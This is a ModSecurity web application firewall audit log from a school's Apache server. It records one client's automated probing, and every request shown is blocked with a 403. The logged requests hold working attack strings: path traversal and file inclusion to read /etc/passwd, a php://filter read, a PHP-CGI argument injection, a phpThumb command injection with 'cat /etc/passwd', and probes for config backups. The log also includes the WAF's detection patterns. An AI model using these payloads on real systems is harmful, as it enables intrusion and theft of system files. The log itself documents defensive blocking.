Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745424818456551 832 (- - -)
Stopwatch2: 1745424818456551 832; combined=310, p1=266, p2=0, p3=0, p4=0, p5=44, sr=72, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c4184b3a-Z--
--7bcadc22-A--
[23/Apr/2025:23:13:47 +0700] aAkRuzI97BrbgvDq16RsfwAAAMA 103.236.140.4 38812 103.236.140.4 8181
--7bcadc22-B--
GET /vendor/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--7bcadc22-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7bcadc22-E--
--7bcadc22-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /vendor/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745424827925757 2166 (- - -)
Stopwatch2: 1745424827925757 2166; combined=765, p1=525, p2=212, p3=0, p4=0, p5=28, sr=135, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7bcadc22-Z--
--4012b259-A--
[23/Apr/2025:23:13:48 +0700] aAkRvDI97BrbgvDq16RsgAAAANc 103.236.140.4 38814 103.236.140.4 8181
--4012b259-B--
GET /download_video.php?path=../../../../etc/passwd HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--4012b259-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4012b259-E--
--4012b259-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_video.php?path=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745424828121832 1955 (- - -)
Stopwatch2: 1745424828121832 1955; combined=570, p1=424, p2=118, p3=0, p4=0, p5=28, sr=73, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4012b259-Z--
--3972cf08-A--
[23/Apr/2025:23:13:48 +0700] aAkRvDI97BrbgvDq16RsggAAANA 103.236.140.4 38820 103.236.140.4 8181
--3972cf08-B--
GET /index.php?page=../../../../etc/passwd HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--3972cf08-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--3972cf08-E--
--3972cf08-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /index.php?page=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745424828315788 2124 (- - -)
Stopwatch2: 1745424828315788 2124; combined=561, p1=416, p2=111, p3=0, p4=0, p5=34, sr=73, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3972cf08-Z--
--dfd70b1a-A--
[23/Apr/2025:23:13:48 +0700] aAkRvDI97BrbgvDq16RshAAAAMo 103.236.140.4 38826 103.236.140.4 8181
--dfd70b1a-B--
GET /download_gambar.php?path=../../../../etc/passwd HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--dfd70b1a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--dfd70b1a-E--
--dfd70b1a-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_gambar.php?path=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745424828513047 2096 (- - -)
Stopwatch2: 1745424828513047 2096; combined=564, p1=430, p2=104, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--dfd70b1a-Z--
--db572716-A--
[23/Apr/2025:23:13:48 +0700] aAkRvDI97BrbgvDq16RshgAAAMM 103.236.140.4 38832 103.236.140.4 8181
--db572716-B--
GET /download_video.php?file=../../../../etc/passwd HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--db572716-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--db572716-E--
--db572716-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_video.php?file=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745424828708095 2013 (- - -)
Stopwatch2: 1745424828708095 2013; combined=566, p1=433, p2=104, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--db572716-Z--
--26914606-A--
[23/Apr/2025:23:13:48 +0700] aAkRvNIw_rqnm4P5_afOWQAAAEY 103.236.140.4 38842 103.236.140.4 8181
--26914606-B--
GET /download.php?path=../../../../etc/passwd HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--26914606-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--26914606-E--
--26914606-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download.php?path=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745424828903281 1788 (- - -)
Stopwatch2: 1745424828903281 1788; combined=451, p1=314, p2=116, p3=0, p4=0, p5=21, sr=53, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--26914606-Z--
--0ff4b010-A--
[23/Apr/2025:23:13:49 +0700] aAkRvTI97BrbgvDq16RsiQAAANM 103.236.140.4 38848 103.236.140.4 8181
--0ff4b010-B--
GET /download.php?file=/etc/passwd HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--0ff4b010-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0ff4b010-E--
--0ff4b010-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download.php?file=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745424829097308 1776 (- - -)
Stopwatch2: 1745424829097308 1776; combined=503, p1=382, p2=93, p3=0, p4=0, p5=28, sr=72, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0ff4b010-Z--
--78050d6f-A--
[23/Apr/2025:23:13:49 +0700] aAkRvRuwXEWV6ydgl52YVwAAAAM 103.236.140.4 38850 103.236.140.4 8181
--78050d6f-B--
GET /download.php?file=../../../../etc/passwd HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--78050d6f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--78050d6f-E--
--78050d6f-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download.php?file=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745424829291783 2042 (- - -)
Stopwatch2: 1745424829291783 2042; combined=696, p1=418, p2=250, p3=0, p4=0, p5=28, sr=73, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--78050d6f-Z--
--517e4a1c-A--
[23/Apr/2025:23:13:49 +0700] aAkRvRuwXEWV6ydgl52YWQAAABM 103.236.140.4 38856 103.236.140.4 8181
--517e4a1c-B--
GET /download_worksheet.php?action=/etc/passwd HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--517e4a1c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--517e4a1c-E--
--517e4a1c-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_worksheet.php?action=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745424829487189 2233 (- - -)
Stopwatch2: 1745424829487189 2233; combined=606, p1=412, p2=166, p3=0, p4=0, p5=28, sr=75, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--517e4a1c-Z--
--d5503e25-A--
[23/Apr/2025:23:15:47 +0700] aAkSM9Iw_rqnm4P5_afPWAAAAEo 103.236.140.4 42252 103.236.140.4 8181
--d5503e25-B--
GET /config.inc.php.old HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--d5503e25-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d5503e25-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||up.smkn22jakarta.sch.id|F|2"] [data ".inc.php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745424947775940 1804 (- - -)
Stopwatch2: 1745424947775940 1804; combined=711, p1=348, p2=337, p3=0, p4=0, p5=26, sr=64, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d5503e25-Z--
--dc1c662f-A--
[23/Apr/2025:23:15:48 +0700] aAkSND1ahuoJLEjKiAU12wAAAJQ 103.236.140.4 42264 103.236.140.4 8181
--dc1c662f-B--
GET /config.inc.php.bak HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--dc1c662f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--dc1c662f-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||up.smkn22jakarta.sch.id|F|2"] [data ".inc.php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745424948168932 2396 (- - -)
Stopwatch2: 1745424948168932 2396; combined=791, p1=376, p2=384, p3=0, p4=0, p5=30, sr=61, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--dc1c662f-Z--
--21bf7627-A--
[23/Apr/2025:23:15:49 +0700] aAkSNTI97BrbgvDq16Rt4AAAAMw 103.236.140.4 42314 103.236.140.4 8181
--21bf7627-B--
GET /index.php?-d+allow_url_include%3Don+-d+auto_prepend_file%3Dphp%3A//input HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Content-Length: 42
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--21bf7627-C--
--21bf7627-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--21bf7627-E--
--21bf7627-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:-d allow_url_include=on -d auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:-d allow_url_include=on -d auto_prepend_file=php://input: -d allow_url_include=on -d auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745424949563684 4175 (- - -)
Stopwatch2: 1745424949563684 4175; combined=2849, p1=502, p2=2320, p3=0, p4=0, p5=27, sr=74, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--21bf7627-Z--
--f4cde14f-A--
[23/Apr/2025:23:15:50 +0700] aAkSNhuwXEWV6ydgl52ZrwAAABg 103.236.140.4 42342 103.236.140.4 8181
--f4cde14f-B--
GET /phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--f4cde14f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f4cde14f-E--
--f4cde14f-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745424950542484 2405 (- - -)
Stopwatch2: 1745424950542484 2405; combined=726, p1=420, p2=267, p3=0, p4=0, p5=39, sr=72, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f4cde14f-Z--
--a6ad954f-A--
[23/Apr/2025:23:15:52 +0700] aAkSONIw_rqnm4P5_afPYAAAAEE 103.236.140.4 42394 103.236.140.4 8181
--a6ad954f-B--
GET /wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=/etc/passwd HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--a6ad954f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a6ad954f-E--
--a6ad954f-H--
